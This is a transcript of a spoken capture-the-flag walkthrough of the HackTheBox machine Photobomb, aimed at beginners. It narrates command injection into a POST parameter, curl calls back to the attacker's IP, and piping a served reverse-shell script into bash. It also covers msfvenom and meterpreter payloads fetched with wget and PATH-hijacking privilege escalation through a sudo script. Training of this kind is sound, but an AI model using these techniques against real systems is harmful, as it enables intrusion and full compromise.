How's it going? This is Turkish Coffee. Welcome to my channel. Today we're working on PHOTOBOMB, which is an easy Linux machine from HackThebox. Off to the content review. Tools used are like very simple network enumeration, basic network enumeration with ping and nmap. We'll find, of course, there is an HTTP open or maybe HTTPS, who knows? Open, and so we'll burp it, yeah. We'll find a request, post request, which is actually interesting. And of course, as you can imagine, in that request, there is an entry point, yeah. Which is actually, in my experience, one of the hardest parts of like web application is finding the entry point. Yeah, I don't know in your opinion, I don't know in your experience, but to me that's the hardest part. Yeah. Anyway, we find it and then we start calling back home with a very simple call. We catch it, of course, with netcat, and from that point on we craft like a reverse shell, and as you can imagine, we serve it with Python HTTP server, and that's it. Yeah, then we basically in the box. As you know, if you've been following me for some time, you know that I don't like just getting into the box. I just do the pre-ask portion and goodbye. I like to work it out a bit. Can I say work it out a bit? I don't know. To do more actually, you know, than the basic things. That's why we'll craft a couple of other payloads with MSF Venom. Why? Because I like to have more than just one shell on the box. Yeah, I know there are programs like Tmux, I guess. Tmux, I don't know how it's pronounced, but anyway, which is the thing, but I don't use it. I don't know how to use it. Probably I will learn Tmux in the future. I'm not sure if it's called Tmux anyway, but anyway, just a couple of shell, you know, couple of shell on the box. Very good. If one drops, then you have the other one. The cool part of this is that there is a trick to run it in the background. So if you launch it from a terminal, then you can still use that terminal for your stuff, and you have the other shell back on Kali. Yeah. So cool. I will show you this. I will show you later. Anyway, wget to transfer stuff, and chmod to change permission, of course. MSF console. This is we'll be using this to catch the reverse shell, the meterpreter reverse shell with multi-handler. Yeah, good. Command injection. So this is the way we get into the box. As extra, we have a reverse shell. These are the two things I was telling you just a couple of minutes ago. Yeah. So reverse shell with bash, and we'll catch it with netcat with an extra character in the execution command. I'll show you how. And this is the meterpreter shell, which will catch with MSF console. Yeah, nice, very good. With Metasploit. As for the privilege escalation attack, we'll go with the path manipulation attack. Yeah, which is cool. Probably this is the first or second time I see this. Very good. I'm glad to learn it and to learn about it. For sure, I can improve. For sure, you know. There are other ways to escalate this box. There are other ways to get in, but you know, based on what I know, based on my research, this is the content of this video. This is what I did. Yeah? So keep in mind, this is my 15th box, not my 50 box, my 15th box. Yeah. So don't be too harsh with me. Don't be too harsh with critics. But I really accept critics. I really accept comments. Just comment below, contact me if you like, if you don't like, just if you have any suggestions, anything, you know. Like I have a very long how can I put this, I have a very long-term perspective on this. So like if you can suggest me anything, if you can help me, if you can coach me somehow, if you can like do some constructive, can I say constructive critiques, very good. Yeah, everything is accepted. And on the flip side, if I can put it that way, if this can be useful for you, I'm very happy. You know, I'm very happy. Again, I'm not an expert in doing CTF and stuff, but I know a couple of things. And for like beginners, I'm very happy if you can enjoy this content, and anything you need, just ping me. There are my contacts below. There are the social media and stuff. So if this can be helpful to you, to beginners, I'm very, very happy for you. So without further ado, as they say, let's begin. Okay, let's see, first IP. All right, it's there. So ping, let's ping the box. Box is on, as we see. TTL 63. This is, as we knew, is a Linux machine. When it's around double, it's Windows. Yeah, very good. So of course we go with nmap back A for aggressive, the IP and aggressive. Yeah, okay, in a couple of seconds we should have the result back. Maybe. All right, there we go. So 2280 engine X. Okay. Linux kernel. Okay. All right, but you know, we just need this. Yeah, so I tried brute forcing this, no luck. How I get into this box is through HTB. Yeah, so let me show you. So new private window. Okay. Okay, so we have just the static page. Its credentials are in your welcome pack. Who knows where the welcome pack is? You can do a lot of stuff here. You can like trying to go buster it, dear buster it, director brute force. I mean, yeah, of course, but I was able to get in this way. So we are asked to provide credentials, yeah, to get in. Yeah, and you can try to brute force this as well, this login form. Okay, so we have some information here. The way I was able to get in is the following: view page source. Sometimes there are credentials, but this is like, it would be too easy. Yeah, so if you click on photobomb.javascript here, there are some information for us. Yeah, and here are the credentials. Yeah? So just note them down, go back, of course, click. So the first one is this, and the second is bomb with the exclamation mark at the end. Good. So here you can choose whatever image you like. Okay, start burp, make it okay, turn on the interception or the interceptor. I don't know what to call it. And now the fun begins. Let me see. So okay, here we go. Mouse mat, let's go. Okay, so as you can imagine, this is our ticket in. Yeah. As always, like in web application, I'm not an expert in web application because I started with network pentesting, network CTF, stuff like that. Okay, so I have more knowledge. I feel more at ease at home actually with the network pentesting. Yeah, but regarding web apps, what I can say is that the most important thing, the hardest thing is, at least to me, is finding the entry point. Yeah, and it can be anywhere here actually. I found it here. Okay, so let me just take this here. Okay, anyway, we send this to repeater. Okay, good. And now we try to poke around. Yeah, we can just switch this off. Repeater. Okay. All right, I don't care about this. Okay, now we do this. Netcat and LVP 2700. And we go here, we do semicolon, curl, back V. What is it? 10.10.14.6, right? Yeah. 6, and then you go for the port 2700. Yeah, let's see if I'm right. 2700. Yeah, here's the callback. Yeah, okay, good. So this is basically, this is what we need. Yeah, if we are able to make the target box calling us back, that's a very good sign that we can trigger a reverse shell. Yeah, in my experience, I tried to get a reverse shell in a couple of ways here directly, but I wasn't able to do it. Yeah, my bad. I don't know, maybe a lack of experience, a lack of many things, I don't know, but I wasn't able to get the shell right away. Yeah, so I figure out another way to do this. So okay, let me show you. Basically we do a bounce, a jump, maybe bounce, shell bounce. Shell bouncing is the right way to describe this. Basically, what do? We create we create mousepad rev.sh here. This is 14.6, yeah, 27. I can go for 2727. All right, is it like this? All right, so let me explain what we're doing now. Huh? Python HTTP hello server on port. You can go 8 on port. Yeah, if we leave it this way. Oh no, not this one. Okay, port 80. So we are serving on port 80 a reverse shell. Okay, let me show you the reverse shell again. Okay, so this is the reverse shell. Yeah, so this is the file we are serving through HTTP server on port 80. Yeah, and if you check the reverse shell command here, it's telling the caller, okay, to do the following: trigger a shell, okay, to this address, to this IP, to this on this port. Okay, so we're doing that. RLV wrap netcat and LVP on 2727. Okay, so basically what's happening here we make the box call here. Basically, we are telling the box, we are telling the target box from a command we are just typing in a second. Hey box, hey photobomb, call back home on my Kali. Okay, and it's calling here. The call is coming here. Okay, and at that point is executing this command. This command is opening the shell in this other window here. I don't even know if I can call it window anyway, but you know. So here, this is the thing. Okay, it's just a shell bounce or shell bouncing. I don't know if how is this thing called. You know, this is a trick I learned in a couple of boxes back, but it works. I like it. Yeah? Mind that it's essential to pipe bash the thing. To pipe bash, if we don't pipe bash, is not going to run this command. I'm going to show you what I mean. Let me show you what I mean. All right. So curl, we still have our curl command here. Very nice, beautiful. I think we should put it here. Anyway, all right. All right, and we see, and then we go for I think it's on 80. So if it's on 80, it's fine like that. And we go for rev .sh, and then we pipe it in bash. 80. Okay, let's see. Okay, there we go. All right, so we trigger the shell here. We're not actually triggering the shell here. This is the point one of the process. Yeah, we are telling the target box, look, call back to this address on board 80, you know, and get this file. And with pipe bash, we telling the target box, look, execute in bash what's written in this file. All right, otherwise it wouldn't work. This pipe bash matters. All right, very good. So the call comes here, arrives here, lands here, right, and it gets the file, which is this, execute the content, and we get the shell here. Okay, so here's the thing. Yeah, very simple thing. Oh, I'm sorry, I have to stabilize the shell. Okay, good. I think it's Control Z. Okay, SCTY Pro foreground. All right, export term, xterm, export shell bash. Yeah, good, nice. All right, so now we should have a better shell. We'll also be able to do this. Fantastic. Let's clear up some stuff. All right, so now it happened to me actually that, you know, in a few exams, in a few boxes, I had the shell. All right, thing is, I lost it because of this, because of that, you know, many reasons. Yeah, so I came up with an idea. Oh, sorry, I'm having some mud, you know. I came up with an idea. Why? So there are actually two ways not to lose a shell, you know. People are using Tmux, I guess it's called Tmux. I don't even remember, but it's beautiful. I will learn it. But now, honestly, I don't have time to learn it, but I will do it in the future. So, or otherwise, you make so that you have two shells on the same box, so that if one fails, then you have the other one. Thing is, most of the times when you launch a shell from your actual shell to get another one, you lose the capability of operating from that shell. But I came up with this small thing. I don't even know what it's called in English. I don't even know how it's called even in Italian. But anyway, this thing, And so basically what happens if that it executes the command in the background, if you know Linux, and that same thing happens with the reverse shell. So I can put the process in the background. That process is a reverse shell. Simple. Let me show you, because sometimes it's easier to show stuff than explain it. Yeah. All right. Let's have some fun, guys. Let's have some fun. This is so funny. I really like this. I really like this, for real. It's not easy, but I really like it. So, MSF Venom, yeah. Why not having a shell here? 9200. Okay. All right. So, let's craft it. Now we have, so this is the payload, yeah, and you have to make sure the payload is like matches the OS of the target, yeah. So the bit, and of course the OS type, yeah. Then lhost, of course, this is my box. Lport, this is 8200, is my this will be the listener. This is the extension, this is the name. Very simple stuff, yeah. Very good. Should be here. Backdoor. All right. I called it backdoor. I'm not sure if this is technically backdoor, but anyway, let's do it. Okay. What's that? Oh, all right. Okay, guys, let's begin. We are now serving it. I'm in the right folder, yeah. So we're serving it with the HTTP server. wget, you can do this. Oh my god. Which wget? Look. Don't tell me which wget. Okay. Okay. So okay, that's working. So we do wget HTTP 10.10.14.6 on port 80. You can do this, but you can also leave it, because with HTTP it goes by default, I guess. And then we get the shell, and the shell is called backdoor.elf. Yeah? Backdoor.elf, and we pipe it in. Hello, come on. We pipe it into back.elf. Yeah. Okay, it's coming. We have the call, and the file should be here. Okay, chmod plus x back. I don't know what completion. Nice. Okay. Now, if I run it this way, I'm losing this terminal. Okay, but if I run it this way, the process, look at my pronunciation, the process is going in the background, and I will still have capability of working from the shell. This is important, you know, when you are doing an engagement and something, or just doing a CTF, just having some fun, yeah. Anyway, let's do it. So it's okay. Netcat NLVP, it's 8200. Yeah. All right. So let's run it. Okay. So we have it here, and now we just have to stabilize it. Okay. So this is and you see, we still can do stuff here. You know, this is important. This is why we did this all. Yeah, nice, very nice. So exit. You can do this. All right. Okay. Nice. So next, we now have some fun with Metasploit. Okay, so let's create another one. So MSF Venom again, and here the payload, as you can see, is different. This is like this is meterpreter is a shell on steroids. Yeah. we change the IP, we change, I think we can do 48282 of meterpreter. You can go with meter, meter is fine. Meter is fine, 8282. All right. Okay, now we prepare the wget command, HTB 10.10.14.6 on, we serve it on port 80, and then we go for meter.elf, and we go for, I think it's all capital, yeah, meter.elf, yeah. Okay. All right. So we created the bomb, the missile, the bomb, missile or missile, I don't know. Here, okay. So this is the payload, yeah. This is basically what we need to trigger to get the shell back. But as I told you, this is not just a normal shell, yeah. So let me show you what I mean, yeah. First off, it's on 8282. Let me just copy this because I have it in memory. That's like a golden fish memory. Is it called golden fish? I don't know. Anyway, L port 8282, beautiful. So now MSF console, yeah, we start Metasploit this way. Okay, it's here. Schmod plus x with meter.elf. Okay. All right. Now, fantastic. Look how beautiful this banner is. Recon, exploit, payload, and loot. All right. Okay, here we go. So now, I think it's use exploit multi-handler. So multi-handler basically is a netcat on steroid, right? So if meterpreter is a shell on steroid, multi-handler is a netcat on steroid, yeah. Roids, yeah, roid rage, yeah, nice. So options. So first off, Metasploit is telling us using configure payload generic reverse shell TCP. This is we don't want this, yeah. But anyway, I just wanted to show you the options. Actually, we just have to set the port we're listening to and our IP, yeah. And of course the payload. Which we don't do this with netcat, yeah. Netcat just opens the port and that's it, yeah. Here we have the chance to set the payload, yeah. Very nice. So first off, set hellohost down 0. Wow. Options. Okay. Set L port 8282, right? Is it called goldfish or golden fish? I don't know. My English. All right. So options. Okay. Now we have to set the payload, and this has to match the payload we set in MSF Venom. Yeah. Let's see if you're still here. Yeah. So you gotta be the same. If it's not the same, then you're gonna have some troubles. Yeah. So make sure it's the same, or kind of the same. All right. Now I think we can just run it. Okay. So what's happening? Don't tell me. Don't tell me. Oh my god. No. No. Oh, okay. No, working. Ls. So again, we do meter.elf and then we put it in the background. And there we go with the meterpreter session. So, okay, this is the most famous command, yeah, get ready, and get system. Anyway, this is just a demonstration. Okay, we're not going to use meterpreter, we're not going to use metasploit in this box. I just wanted to show you two different types of reverse shells. Yeah, a very common one, a bash reverse shell, very common one, and a meterpreter one. Okay, these are the two extra things, okay, which I mentioned in the content review. Okay, we can just put it in the background with Ctrl+Z, and that's it. We don't need meterpreter anymore in this box. Okay, so now hopefully so now privask, okay, sudo account. Okay, so here's the thing, yeah, of course. So we can basically, what's happening here? I think my shell is kind of broken, I don't know. Anyway, so we can run sudo tacal, means basically is telling us, is showing us what we can run if we can run anything with the sudo permission, yeah, with as root, as if we were root, yeah. So turns out we have something here, yeah. We have cleanup.sh, yeah. So let's see what that cleanup.sh is. So this is a file. We don't care about the file. You can read it, you can study, you can do a lot of stuff with this thing, yeah. But the only thing we need to look for here is basically a command which is not fully, if I can put it that way, indexed. I don't know how to say that, but basically a command which doesn't specify the path which is located in. Okay, I messed up. So we can trigger the system into doing into making him believe we have like, we can trigger the system at this point. We can trigger the system into believing a command is like, a command we create is a command it thinks is the right one. Okay, so but to do that we need to find, of course, find is find. If find is the command, is the killer command. We need to find, I'm sorry for the words, a command where is not like the full path is not specified, yeah. In this case is find. Okay, if in this script find would have been like user being find, then we couldn't have used it, right? But in this case, find is just there as find, so we can manipulate the system, we can manipulate the machine, like the matrix. Okay, let me show you how. Okay, which, you know, sometimes is easier to do it than to explain it, yeah. And then I'm not a professor, so maybe I'm not explaining it perfectly. So again, we have this file, we can run it with root privileges, and once in, we have to look for a command, which in this case is find, okay, which does not report the full path, like in this case user bin truncate or some other one, yeah. Okay, and we have the perfect victim here. It's fine. Nice. So let me show you what we can do. Basically, now we create in this directory in PHOTOBOMB, okay, here, okay, we now creating a fake find command. We are injecting a shell in that command, and then we are telling the system, look, this is the find command, okay. And then in this directory we are running the cleanup.sh file, and in that file at the end, at the very end of that file, there is the find command. What happens? Happen that as soon as the system gets here, reads find. Oh, find. What is this find? Where is this find? Find is here in the present working directory, and that find command is not like the find command is just a fake command which triggers a shell. Given we are running this with sudo permission as if we were root, boom, we are root right away. Okay, hopefully makes sense. I don't know. Let's do it. Okay, so first off, okay, we create find command here, a fake find command, and we're telling it at this moment, just with this command, we are pushing like this thing here. This is the line which tells the system that this is a bash command. Yeah. Next, this. Okay, so the second line of the file will be bin bash, a shell, right? So we are pushing a bash into the find file, so to speak, the fake find command, right? And then we do just the execution on this. Chmod plus x find. Good. Now we are executing it. Okay, I will explain this command just in a second. And we root. Okay, good. So let me explain this thing. So sudo, we can run sudo, yeah, on this file only. Okay, good. Sudo on this file. Beautiful. Then pat basically tells the system where to look for commands, like in this case find, the fake find, right? By setting this thing, by typing this thing, we're telling the system to look in this directory, this one, all right, this one. So in the present working directory first, before checking other locations that like the bin or like user bin stuff, yeah, and that's it. So when the script runs and gets to the end of the script, you know, to the end of the script, there is a find command. Oh, find command, all right, but here the hacker told me that I have to look first in the present working directory for commands. Yeah. Oh, nice. And holy moly, you know, in that fake find command there is a bash shell. Okay, and given we are running the script as root with root privileges, then we root. That's the thing. Hopefully it was clear. Maybe it was not super clear, but I really wish this was useful for you. It was very useful for me. Honestly, this is the first or second time I see this type of privilege escalation attack, and you know, maybe it will be useful in some other boxes or some other exams. So this is the end of the video. I had fun. I had to struggle a bit with the privilege escalation thing. Honestly, getting into the box is not so hard. It's actually simple, yeah. The only thing you have to figure out is the entry point in the web application in the post request, yeah. Once done that, you know, you just have to do your usual stuff. Thank you very much for this. Thank you very much for watching this. I just have 19 subscribers as of now, as of January 2025, but I'm very happy I'm very happy for this. Very happy that I started this channel. As you know, my main goal is, of course, getting better in pen testing, getting better at CDF, getting better at everything, you know. And my aim is, as I probably said, doing like, again, like I would say 10 to 15 boxes for this year, but done well. Not, oh, let's do it, let's get in, let's get through it, goodbye. No, I mean, I like to reason stuff, I like to think about stuff, yeah. But anyway, hopefully you had some fun with me. Hopefully it was useful for you. In my probably limited skills, I try to give back to the community. When I started some time ago, I learned a lot from the community. At the time, there was no such help as nowadays. There were less certifications, there were less YouTube channels. Like now it's great, now it's fantastic. So if I can help you, if I can help beginners like me, or like 100% beginners, I don't know, I'm very happy to do this. There are my contacts below. You can like send me an email, send me a message, whatever, and I'll be happy to help out or to discuss everything. I don't know, if you just want to have a talk, and you know where to find me. Thank you very much for this, and I wish you a beautiful day. Bye.